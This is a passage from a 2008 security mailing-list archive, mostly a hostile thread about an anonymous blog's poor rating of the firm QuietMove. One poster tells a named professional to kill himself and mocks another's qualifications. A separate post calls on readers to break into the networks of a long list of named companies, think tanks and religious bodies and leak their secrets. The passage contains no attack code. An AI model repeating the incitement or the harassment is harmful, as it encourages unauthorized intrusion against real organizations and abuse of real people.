	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
Message-ID: <8ebbd7f50801011106x75245a82m41c21586a6c27984@mail.gmail.com>

On Jan 1, 2008 7:33 PM, reepex <reepex at gmail.com> wrote:

> http://www.tssci-security.com/bookshelf/
>
> Is this list up to date?  It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C? ( Seeing as C books
> are in your 'to-read' list ).

The C programming book listed on the bookshelf has be given a "Not
Recommended" review by the ACCU.



From marcinw86 at gmail.com  Tue Jan  1 19:08:11 2008
From: marcinw86 at gmail.com (Marcin Wielgoszewski)
Date: Tue, 1 Jan 2008 14:08:11 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
Message-ID: <cb63c2fc0801011108l6fef8ffcq988c32a181dd4679@mail.gmail.com>

You're right. I'm new and young and I'll be the first to admit it. We
can't all be born security gurus, and I'm not trying to hide that, but
me aside... what have you done besides hide behind your gmail account
and troll FD?

Thanks for pointing out those two pages, two pages out of 100's that
were posted a long time ago and yes, are very out of date.

On Jan 1, 2008 1:33 PM, reepex <reepex at gmail.com> wrote:
> You are worthless.
>
> http://www.tssci-security.com/bookshelf/
>
> Is this list up to date?  It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C? ( Seeing as C books
> are in your 'to-read' list ).  Do you understand any of the code in it or do
> you just pick out buzz words to talk about at your 'local meet-ups'. Why
> dont you explain the finer points of microkernel design to us?
>
> You are headed even further down the path of complete lamer seeing as you
> read books on XSS and all your blog posts revolve around it.
>
> even more lulz in your 'plan to read' containing books on fuzzing,
> metasploit, and writing rootkits. How can you write rootkits when you do not
> know C and are learning basic unix commands?... lol
>
> Hopefully one day you realize that you are just another security industry
> kiddie and have no real knowledge, but probably not. Seeing as you have your
> 'bachelors' ( lol - has nothing to do with security ) - I am sure you are
> well on your way to a cissp.
>
> Also for good laugh speople should read:
>
> http://www.tssci-security.com/projects/
>
> how long did it take you to write all 40 lines of your 'labs' code? I shall
> notify perl underground of your horrendous perl and you shalll be a source
> of great lulz in their next production.
>
> Just found this:
> http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
> So you worked 4 places and did nothing useful. Sounds like SImon may want to
> hire you. ( Hi simon , are your workers still inadequate and you need more
> help? )
>
> So basically you have worked 4 jobs, went to a community college that has
> some sort of security program, you know basic perl and C, do not know how to
> audit any real programs, and blog about XSS.   Does this summarize you
> pretty well?
>



From adam.muntner at quietmove.com  Tue Jan  1 19:33:36 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 14:33:36 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <e9d9d4020801011012i2a8b5000o498cbcadb0b42c0f@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
	<e9d9d4020801011012i2a8b5000o498cbcadb0b42c0f@mail.gmail.com>
Message-ID: <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>

That would be an incorrect assumption. As I mentioned in the followup  
email - I types my response on my phones touchscreen, on a moving train.

D- on your reading comprehension skills.

F on your need to diss, anonymously.

F- on if there is such a thing based on your suggestion of suicide for  
my choice in cell phone. Save your allowance and maybe you could buy  
one, too.

I will stand by my words. I sign my name to them. Though, based on the  
content and quality of your posts, I see why you won't.

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 1:12 PM, reepex <reepex at gmail.com> wrote:

> On Jan 1, 2008 9:04 AM, Adam Muntner <adam.muntner at quietmove.com>  
> wrote:
> I hsve been pentesting since 98 and nearly nonstop since 2000.
>
> You cannot spell either and you have been a 'pentester' ... does  
> this mean you ran nessus and other automated testing tools and call  
> yourself a hacker?
>
> Sent from my iPhone
>
> Please kill yourself
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/3b0f0c33/attachment.html 

From reepex at gmail.com  Tue Jan  1 19:49:47 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 13:49:47 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <cb63c2fc0801011108l6fef8ffcq988c32a181dd4679@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
	<cb63c2fc0801011108l6fef8ffcq988c32a181dd4679@mail.gmail.com>
Message-ID: <e9d9d4020801011149r1eb943ag9dfafb5d779bd48b@mail.gmail.com>

your attitude sure has changed since your last post. Maybe you shouldn't
sound so commanding on a real list next time and instead stick to your local
2600 meetings.

On Jan 1, 2008 1:08 PM, Marcin Wielgoszewski <marcinw86 at gmail.com> wrote:

> You're right. I'm new and young and I'll be the first to admit it. We
> can't all be born security gurus, and I'm not trying to hide that, but
> me aside... what have you done besides hide behind your gmail account
> and troll FD?
>
> Thanks for pointing out those two pages, two pages out of 100's that
> were posted a long time ago and yes, are very out of date.
>
> On Jan 1, 2008 1:33 PM, reepex <reepex at gmail.com> wrote:
> > You are worthless.
> >
> > http://www.tssci-security.com/bookshelf/
> >
> > Is this list up to date?  It makes it seem as if you are learning basic
> > linux commands, sed, and basic perl. Also why are you reading operating
> > system design and implementation when you do not know C? ( Seeing as C
> books
> > are in your 'to-read' list ).  Do you understand any of the code in it
> or do
> > you just pick out buzz words to talk about at your 'local meet-ups'. Why
> > dont you explain the finer points of microkernel design to us?
> >
> > You are headed even further down the path of complete lamer seeing as
> you
> > read books on XSS and all your blog posts revolve around it.
> >
> > even more lulz in your 'plan to read' containing books on fuzzing,
> > metasploit, and writing rootkits. How can you write rootkits when you do
> not
> > know C and are learning basic unix commands?... lol
> >
> > Hopefully one day you realize that you are just another security
> industry
> > kiddie and have no real knowledge, but probably not. Seeing as you have
> your
> > 'bachelors' ( lol - has nothing to do with security ) - I am sure you
> are
> > well on your way to a cissp.
> >
> > Also for good laugh speople should read:
> >
> > http://www.tssci-security.com/projects/
> >
> > how long did it take you to write all 40 lines of your 'labs' code? I
> shall
> > notify perl underground of your horrendous perl and you shalll be a
> source
> > of great lulz in their next production.
> >
> > Just found this:
> >
> http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
> > So you worked 4 places and did nothing useful. Sounds like SImon may
> want to
> > hire you. ( Hi simon , are your workers still inadequate and you need
> more
> > help? )
> >
> > So basically you have worked 4 jobs, went to a community college that
> has
> > some sort of security program, you know basic perl and C, do not know
> how to
> > audit any real programs, and blog about XSS.   Does this summarize you
> > pretty well?
> >
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/885be400/attachment.html 

From reepex at gmail.com  Tue Jan  1 20:47:06 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 14:47:06 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
	<e9d9d4020801011012i2a8b5000o498cbcadb0b42c0f@mail.gmail.com>
	<3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>
Message-ID: <e9d9d4020801011247u4e9a0e5eife5e18a3d04ccdd4@mail.gmail.com>

So what exactly do you do then?  Please explain your skills to us since you
conveinenly avoided my questions about your metasploit and auto hacking
skills.

On Jan 1, 2008 1:33 PM, Adam Muntner <adam.muntner at quietmove.com> wrote:

> That would be an incorrect assumption. As I mentioned in the followup
> email - I types my response on my phones touchscreen, on a moving train.
>
> D- on your reading comprehension skills.
>
> F on your need to diss, anonymously.
>
> F- on if there is such a thing based on your suggestion of suicide for my
> choice in cell phone. Save your allowance and maybe you could buy one, too.
>
> I will stand by my words. I sign my name to them. Though, based on the
> content and quality of your posts, I see why you won't.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sent from my iPhone
>
> On Jan 1, 2008, at 1:12 PM, reepex <reepex at gmail.com> wrote:
>
> On Jan 1, 2008 9:04 AM, Adam Muntner < <adam.muntner at quietmove.com>
> adam.muntner at quietmove.com> wrote:
>
> > I hsve been pentesting since 98 and nearly nonstop since 2000.
> >
>
> You cannot spell either and you have been a 'pentester' ... does this mean
> you ran nessus and other automated testing tools and call yourself a hacker?
>
>
>
> > Sent from my iPhone
> >
>
> Please kill yourself
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/4052aae9/attachment.html 

From andreg at gmail.com  Tue Jan  1 03:36:49 2008
From: andreg at gmail.com (Andre Gironda)
Date: Mon, 31 Dec 2007 20:36:49 -0700
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>

On Dec 31, 2007 2:13 PM, secreview <secreview at hushmail.com> wrote:
> Not sure about our readers, but to us at Secreview that hardly
> makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...

Pardon me, but who is this?  "secreview"?  Who is behind this email
address?  If you don't identify yourself then I assume that this
entire thread is some sort of vengeance play.

> According to the QuietMove website, Adam "has over 14 years of experience in
> information security, software, and product R&D with 8 years being dedicated
> solely to security." His QuietMove bio goes on to say "Adam's particular
> talents include penetration testing of web and binary applications,
> networks, systems, and SCADA, "social engineering" and physical penetration
> of facilities, and in developing professional services offerings."
>
> This just doesn't add up.

I can vouch for Adam's 14 years of experience and then some.  When I
met Adam in 1992, he already had a strong command of Unix security.
He was an administrator (1 of 4 total over 7 years) of Unphamiliar
Territories (UPT), a vulnerability research BBS that ran from 1989 -
1996.  It was a prominent place for information about vulnerability
research.  Many held it in higher regard than Phrack magazine or any
leading website/magazine during that time period.

Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from
UPT, and the code was re-used and made available in Phrack magazine as
well as integrated into the Linux kernel or features thereof.  UPT was
about 5-6 years ahead of the NSA before they released SELinux and 7-8
years ahead of projects such as GRSecurity.  Anyone making such an
enormous contribution to this sort of project has certainly provided a
greater service to our industry than a "secreview"/company-bashing
organization such as yourself.

> Anyway, remember we didn't set out to bash anyone here

Well then you should read your email before you hit the "send" button.

> but Adam/QuietMove
> put himself/themselves in the line of fire. QuietMove appears to be a very
> small and disorganized shop. Their website is half-assed and incomplete and
> we can't say anything better about their talent profile. We suggest that
> QuietMove complete their website and review their talent profile, then we'll
> set out to do another review and see if they score better. As of right now,
> we can't give them more than a D-. We'll keep an eye on their website and
> redo this review if they ever fix their issues.

Many small businesses such as QuietMove have a hard enough time
staying alive in this industry.  I suggest you "pick on someone your
own size" even if you have a legitimate problem with QuietMove or
Adam.

Compared to the other companies that you mentioned (Accuvant, IBM/ISS,
Pegasus), QuietMove will certainly provide a much more friendly
service environment for companies to work in.  I would put my
recommendation of quality on the work QuietMove does as A+.  There are
few PCI ASV's or penetration testing companies that I would find any
value in -- and QuietMove exceeds my expectations in this area.

Cheers,
Andre



From reepex at gmail.com  Tue Jan  1 22:11:14 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 16:11:14 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
Message-ID: <e9d9d4020801011411y5b14122fnbaaa958fd6fb5c69@mail.gmail.com>

On Dec 31, 2007 9:36 PM, Andre Gironda <andreg at gmail.com> wrote:

> Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from
> UPT,


what exactly was borrowed? because I am pretty sure none of the hackthissite
founders were around when this magazine was.


> There are few PCI ASV's or penetration testing companies that I would find
> any

value in -- and QuietMove exceeds my expectations in this area.
>

what are their methods? No one has answered that yet.. I imagine being a
small company they must rely on alot of automated testing due to time/man
power restraints
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/7adc5d95/attachment.html 

From mdz at prohest.com  Wed Jan  2 00:04:42 2008
From: mdz at prohest.com (Martin Zimmermann)
Date: Wed, 02 Jan 2008 01:04:42 +0100
Subject: [Full-disclosure] [Professional IT Security Providers -
 Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <477AD51A.1080401@prohest.com>

Nice try, but....



Adding, spelling and content sucks. Do better research next time.

So thats; 2 try's, 2 Fails, 0 passed on your reviews.

/See me after class..

Hugz



secreview skrev:
> QuiteMove, located at http://www.quitemove.com <www.quietmove.com> is
> a small Professional IT Security Services Provider that offers
> Training services, Incident Response Services, Web Application
> Security Services and Penetration Testing Services. QuiteMove was
> started by Adam Munter in 2006 along with Jeffrey Rassas, and James
> Garvey, Jr. You can read their mission statement here
> "http://www.mywikibiz.com/Directory:QuietMove" (but its pretty basic).
>
> When reviewing the QuiteMove website and people we were not the least
> bit impressed. The QuiteMove website is packed full of grammatical
> errors and many of the services don't even have descriptions. The
> services that do have descriptions are very poorly written and very
> poorly defined. Take a look at their Penetration Testing service
> offering as an example. If you want to see an example of no content
> check out their Social Engineering offering.
>
> Since we were unable to extract anything useful from the materials
> provided to us by QuiteMove we decided to focus on the talent behind
> QuietMove. Unfortunately we were equally unimpressed. The only
> technically oriented team members that we were able to identify within
> QuietMove were Adam Munter, who is a founder and Marcin Wielgoszewsk,
> who is a very "green" consultant. Seeing as Adam Munter is being
> positioned as the technical visionary for QuietMove, we decided to
> focus on him and not on Marcin.
>
> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y
>
> As it turns out Adam Munter worked for Accuvant, a company that
> competes directly with Adam's QuietMove; prior to founding QuietMove.
> Adam's role at Accuvant was to lead consultants on IT Security
> Engagements for large orginazations. In conjunction with this, Adam
> also spoke at conferences. He worked here for 1 year and 1 month.
>
> Prior to working for Accuvant, Adam worked for Pegasus Solutions Inc.
> as the acting Chief Security Officer. Pegasus is the largest hotel
> reservation distribution system vendor and a major vendor of Hotel
> Management systems. Adam did get some Sarbanes Oxley work under his
> belt as he helped Pegasus to successfully "marshall" through their
> first audit. Adam also initiated the program to help get Pegasus to be
> Visa CISP compliant, including evaluating and changing their handling
> of payment Cardholder data. He worked here for 2 years and 1 month.
>
> From August 2000 to January 2003 Adam was a "Founding member of IBM's
> Ethical Hacking Center of Competency." His responsibilities included
> being a technical interviewer for new hires, a Penetration Testing
> Subject Matter Expert, and the performance of consulting engagements
> for clients ranging from midsize companies and government agencies to
> the fortune 500. Adam worked for IBM for 2 years and 6 months.
>
> So if we add up the relevant experience that Adam has had according to
> his linked in bio we get 1 year and 1 month + 2 years and 6 months,
> which is a grand total of 3 years and 7 months of professional IT
> Security Consulting Experience. Not sure about our readers, but to us
> at Secreview that hardly makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...
>
> According to the QuietMove website, Adam "has over 14 years of
> experience in information security, software, and product R&D with 8
> years being dedicated solely to security." His QuietMove bio goes on
> to say "Adam?s particular talents include penetration testing of web
> and binary applications, networks, systems, and SCADA, ?social
> engineering? and physical penetration of facilities, and in developing
> professional services offerings."
>
> This just doesn't add up.
>
> Anyway, remember we didn't set out to bash anyone here, but
> Adam/QuietMove put himself/themselves in the line of fire. QuietMove
> appears to be a very small and disorganized shop. Their website is
> half-assed and incomplete and we can't say anything better about their
> talent profile. We suggest that QuietMove complete their website and
> review their talent profile, then we'll set out to do another review
> and see if they score better. As of right now, we can't give them more
> than a D-. We'll keep an eye on their website and redo this review if
> they ever fix their issues.
>
>
> Score Card (Click to Enlarge)
> <http://bp1.blogger.com/_VcwqM25xL9M/R3lFJMGqVQI/AAAAAAAAAB8/up18_GDuZ8c/s1600-h/Y022OY.jpeg>
>
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed
> <http://secreview.blogspot.com/2007/12/quietmove-d.html> at 12/31/2007
> 11:32:00 AM
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 

View Martin Dipo Zimmermann's profile on LinkedIn
<http://www.linkedin.com/in/mdzdk>


?If you think technology is gonna solve your security problems, then you
dont understand your problems, and you dont understand the technology..?
Bruce Schneier
 
-----BEGIN PGP SIGNATURE-----
mdz at prohest.com
http://www.prohest.com
Version: GnuPG v1.4.7
Primary key fingerprint:  BDB3 A681 67AC 4D2D 8A62 D1EC 64D1 531B 81B5 4B5A
-----END PGP SIGNATURE-----
 
"Never believe anything until it's officially denied."
Claud Cockburn


<http://www.shirtcity.com/myshirtshop/merchandising/513218/t-shirtshop.html>




---
avast! Antivirus: Outbound message clean.
Virus Database (VPS): 080101-0, 01-01-2008
Tested on: 02-01-2008 01:04:42
avast! - copyright (c) 1988-2008 ALWIL Software.
http://www.avast.com


-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/5857d4a0/attachment.html 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Fail drphilfailfl3.jpg
Type: image/jpeg
Size: 86290 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/5857d4a0/attachment.jpg 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Prohest.jpg
Type: image/jpeg
Size: 2255 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/5857d4a0/attachment-0001.jpg 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: btn_linkedin_120x30.gif
Type: image/gif
Size: 2153 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/5857d4a0/attachment.gif 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 5715cced16aa18d396862d33b7ea34c1.jpg
Type: image/jpeg
Size: 11076 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/5857d4a0/attachment-0002.jpg 

From gmaggro at rogers.com  Wed Jan  2 02:21:54 2008
From: gmaggro at rogers.com (gmaggro)
Date: Tue, 01 Jan 2008 21:21:54 -0500
Subject: [Full-disclosure] Corporations and Institutes to target for attack
	& exploitation
Message-ID: <477AF542.60500@rogers.com>

I have been doing some thinking, and it seems to me upon surveying the
'scene' (excluding the profiteering criminal element) that too many
people resemble anti-globalization protesters. I do not mean that in a
positive way; I'm talking about the fools who smash the windows of small
businesses in the course of protesting large multinational corporations.

There does seems to be a sense of rage, certainly disappointment, in a
number of people regarding their ability to effect change... but it's
poorly articulated. Someone elsewhere the other day reflected back on
the LA Riots, expressing disappointment that the rioters violated their
own neighbourhoods instead of tearing up mansions in Beverley Hills. An
apt metaphor.

While there isn't enough aggression directed at pop culture noise sites
like myspace, youtube, or facebook and others, we risk getting
distracted by focusing on that sort instead of laying a beating on
entities that deserve a stronger brand of justice. I'm not sure how to
strike a balance in that regard anymore.

Might I suggest, or even plead, that you bend your talents towards
giving these folks the hardest time possible? Penetrate their networks
and those of their partners and make secrets known, their employees
uncomfortable - you lie down with dogs, you get fleas - and make the
price of doing dirty business as high as possible.

Expect complications due to use of fronts, renamings, holding companies,
etc.

Names come from a mix of sites and are ranked in no particular order of
importance. I'd lay the boots to Monsanto and the Church Of Scientology
first, but ? chacun son go?t.

AB Biodisk
AIR QUALITY STANDARDS COALITION
ALLIANCE FOR THE PRUDENT USE OF ANTIBIOTICS
Abbot Laboratories
Accuracy in Media
Adam Smith Institute
Alcon Research, Ltd.
American Enterprise Institute
American International Group, Inc
Association for Better Living and Education.
AstraZeneca
Atlas Economic Research Foundation
Bionomic Institute
Bristol-Myers Squibb Co.
Brookings Institution
Burstein Technologies, Inc.
Castle Rock Foundation (formerly known as The Coors Foundation)
Cato Institute
Center for Independent Studies
Center for Strategic and International Studies
Center for the Defense of Free Enterprise
Center on Budget and Policy Priorities
Charles G. Koch Charitable Foundation
Church Of Scientology
Church Of Spiritual Technology
Claude R. Lambe Charitable Foundation
Competitive Enterprise Institute
Cubist Pharmaceuticals, Inc.
Cult Awareness Network (now a Scientology front)
DSM Anti-Infectives, B.V.
Discovery Institute
Earhart Foundation
Essential Therapeutics, Inc.
ExxonMobil
Foundation for Economic Education
Fraser Institute
Frontiers of Freedom Institute/People for the USA
GlaxoSmithKline
Heartland Institute
Heritage Foundation
Hoover Institute
Hudson Institute
Institute for Justice
Institute for Policy Innovations
International Center for Pension Reform
JM Foundation
John M. Olin Foundation, Inc.
LIBRA Initiative, Bayer AG, Pharmaceutical Division
Leadership Institute
Lilly Research Laboratories
Lynde and Harry Bradley Foundation
Merck
Milton and Rose D. Friedman Foundation
Monsanto
National Anxiety Center
National Center for Policy Analysis
National Center for Public Policy Research
Ortho-McNeil Pharmaceutical Inc.
Pacific Legal Foundation
Pacific Research Institute
Paratek Pharmaceuticals, Inc.
Pharmacia Corporation
Philip-Morris/Altria Group, Inc.
Political Economy Research Center
Progress and Freedom Foundation
R.W. Johnson Pharmaceutical Research Institute of Johnson & Johnson
RAND Corporation
Reason Foundation
Religious Technology Center
Roche Pharmaceuticals and Roche Labs
Scaife Foundations
State Policy Networks's database of state-focused think tanks
The Clorox Company
The National Forum Foundation
The Objectivist Center
USAID
Washington Legal Foundation
World Institute of Scientology Enterprises
Wyeth-Ayerst Research
Procter & Gamble Pharmaceuticals







From secreview at hushmail.com  Wed Jan  2 03:35:12 2008
From: secreview at hushmail.com (SecReview)
Date: Tue, 01 Jan 2008 22:35:12 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
Message-ID: <20080102033512.49610D0038@mailserver10.hushmail.com>

Readers (and haters)

Just so we're clear, we've offered QuietMove a second shot at being 
reviewed. As a result we're going to remove our existing review and 
release a new review in short time. As usual, we'll do our best to 
make sure that the reviews are truthful and honest. To date, 
QuietMove has not provided us with any information that contradicts 
anything that we've written in our origional post. We're still 
waiting for answers back from them. 


Regards, 
      The Secreview Team
      http://secreview.blogspot.com

--
Click here to find experienced pros to help with your home improvement project.
http://tagline.hushmail.com/fc/Ioyw6h4eNIBD2IGLGtKWD4rTekRP64uZlKbIP0NMW7JITemuz66eF6/
      Professional IT Security Service Providers - Exposed



From reepex at gmail.com  Wed Jan  2 04:51:30 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 22:51:30 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
	<e9d9d4020801011411y5b14122fnbaaa958fd6fb5c69@mail.gmail.com>
	<2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
Message-ID: <e9d9d4020801012051k3cd0bc9eu161401214b9be62f@mail.gmail.com>

On Jan 1, 2008 9:53 PM, Andre Gironda <andreg at gmail.com> wrote:

> I wouldn't do a direct comparison, but I thought UPT was more about being
> funny than being seriously
> challenging.


ok so they are nothing alike because ptp/hts actually teach you stuff while
"UPT" was for jokes... so your post was stupid


> Look, you rated Denim Group as A-.  You must either work there - or
> know the guys.  Dan Cornell is a moron compared to Adam Muntner - and
> his code is certainly worse (e.g. Sprajax).


I am not a part of secreview but I realize following email threads is very
complicated for you.


> Adam and team know Burp Suite, use manual web application testing - in
> addition to traditional dynamic and static analysis.
>
> I have seen Adam and crew using Fortify Software's SCA and Tracer
> tools.  I have seen them using Hailstorm ARC and modifying the
> Javascript included in the SmartAttack library.  I would call this a
> best-of-breed security testing methodology.


So you list 5 tools they use then mention they modify a javascript
library...  So basically they use automated tools and  are former  web
developers ... sound pretty hardcore


> More people will read mine than anything you do -- and with my name on it
> -- they are certainly bound to take it a lot more seriously.
>

You must be a cissp because you take yourself and the internet very
seriously. I am pretty sure no one cares about your opinion either.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/8d7c4794/attachment.html 

From reepex at gmail.com  Wed Jan  2 04:53:31 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 22:53:31 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <20080102033512.49610D0038@mailserver10.hushmail.com>
References: <20080102033512.49610D0038@mailserver10.hushmail.com>
Message-ID: <e9d9d4020801012053v30906a14k9ee9ed660f367a00@mail.gmail.com>

On Jan 1, 2008 9:35 PM, SecReview <secreview at hushmail.com> wrote:

> QuietMove has not provided us with any information that contradicts
> anything that we've written in our origional post. We're still
> waiting for answers back from them.


It is probably because they, like everyone else, do not care about your
opinion.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/99fab161/attachment.html 

From coderman at gmail.com  Wed Jan  2 06:18:38 2008
From: coderman at gmail.com (coderman)
Date: Tue, 1 Jan 2008 22:18:38 -0800
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <e9d9d4020801012051k3cd0bc9eu161401214b9be62f@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
	<e9d9d4020801011411y5b14122fnbaaa958fd6fb5c69@mail.gmail.com>
	<2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
	<e9d9d4020801012051k3cd0bc9eu161401214b9be62f@mail.gmail.com>
Message-ID: <4ef5fec60801012218obbc3f6eue847d5464989e709@mail.gmail.com>

On Jan 1, 2008 8:51 PM, reepex <reepex at gmail.com> wrote:
> ...
> So you list 5 tools they use then mention they modify a javascript
> library...  So basically they use automated tools and  are former  web
> developers ... sound pretty hardcore

this is sufficient skill for lucrative security audit / validation
testing in the corporate / gov world.  i don't think anyone would call
that 'hardcore' exploit / pentest / redteam ability...

are you in it for money or love?  this changes the aspect entirely.

the majority of security services paid for by these organizations is
routine application of accepted industry guidelines as defined by
usually bulky and cumbersome committees of varied competence and
efficacy...

this, and the complete lack of rigor / utility of secreview's sewaqe
writing, is why i could care not even half a mouse's shit less about
any of these reviews.

please shut the fuck up secreview.  kthx



From secreview at hushmail.com  Wed Jan  2 07:17:32 2008
From: secreview at hushmail.com (secreview)
Date: Tue, 1 Jan 2008 23:17:32 -0800 (PST)
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed]
	QuietMove ( F + )
Message-ID: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>

Our first QuietMove review can be found here.QuietMove, located at
http://www.quietmove.com is a Professional IT Security Services company
that was founded by Adam Muntner, Jeffrey Rassas and James G. (Jim)
Garvey, Jr. We?ve already performed one review of QuietMove but Adam
Munter and his team didn?t like the review. As a result, we?ve gone
back and revisited our data and are producing this second, hopefully
more accurate review.Our first point of criticism is still the
QuietMove web-site. Their services are poorly defined, and even
somewhat contradictory. For example, under their Penetration Testing
section they nearly bash the use of Automated tools. Shortly thereafter
they go on to say that they offer services for nearly the same cost as
?cookie-cutter? services.Well, we still have a problem with that. The
overhead cost of using quality talent is always going to be far greater
than the fees charged by vendors that sell automated scanning software.
Any time someone tells us that they can offer ?expert driven? services
at the same price points or even nearly the same as a ?cookie cutter?
service, we say bullshit.Taking it a step further, we still stick by
our previous opinion that the QuietMove website doesn?t have much to
offer prospective customers in the way of useful information. The
services shown are very poorly defined; the grammar is still horrible,
and frankly the website is incomplete. Want to see what we mean, click
on their ?Social Engineering? tab under their service offerings; you?ll
notice that there is no description. We hope that their website does
not reflect the quality of their services.When Adam Muntner read our
previous post where we commented on the QuietMove Website he responded
in a reactive, emotional, and unprofessional manner. You can read his
response to our first post here, insults and all. Unfortunately for
Adam, his unprofessional attitude hurt QuietMove during this second
review.Regardless, Adam did react to our website comments, and his
reaction was as follows, verbatim:?Most of our clients are referred by
others who are very satisfied with the work we perform. Not by the
website. It doesn't get a lot of attention - were small but growing and
focused on serving our clients. I know basic HTML seems like the
pinnacle of achievement to you, but we aren't in the business of making
pretty web pages. We discuss our methodology with our clients-we don't
post it on the web. I know you were hoping to learn nimething. Hacking
for dummies might be more your speed, after you perfect your Cunt and
